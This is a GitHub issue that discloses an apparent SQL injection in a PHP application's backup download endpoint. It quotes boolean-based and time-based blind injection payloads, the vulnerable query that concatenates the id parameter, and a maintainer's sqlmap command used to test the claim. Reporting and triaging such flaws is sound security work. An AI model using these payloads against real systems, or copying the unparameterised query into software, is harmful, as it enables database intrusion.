Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Security Bugs] SQL Injection #124

Closed
qmss opened this issue Dec 22, 2021 · 1 comment
Closed

[Security Bugs] SQL Injection #124

qmss opened this issue Dec 22, 2021 · 1 comment
Labels
bug Something isn't working

Comments

@qmss
Copy link

qmss commented Dec 22, 2021

SQL injection exists in the /admin/modules/system/backup.php file. There is no effective defense against the comment field, leading to SQL injection attacks.
The link is: http://192.168.31.63/admin/modules/system/backup.php?action=download&id=1
Vulnerable parameter id
SQL injection payload
Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: action=download&id=2 OR NOT 8551=8551
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=download&id=2 AND (SELECT 7623 FROM (SELECT(SLEEP(5)))zpJu)
7
The problematic code
if(isset($_GET['action']) && isset($_GET['id']) && $_GET['action'] == 'download'){ $id = utility::filterData('id', 'get', true, true, true); $_q = $dbs->query("SELECT backup_file FROM backup_log WHERE backup_log_id=".$id); $path = $_q->fetch_row()[0];

@qmss qmss added the bug Something isn't working label Dec 22, 2021
@drajathasan
Copy link
Collaborator

Not affected with level 5.

sqlmap -u "http://localhost:6001/admin/modules/system/backup.php?action=download&id=1" --level=5 --cookie=<cookie> --batch

Defailt
SQLMap : 1.6.12#stable

gambar

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

2 participants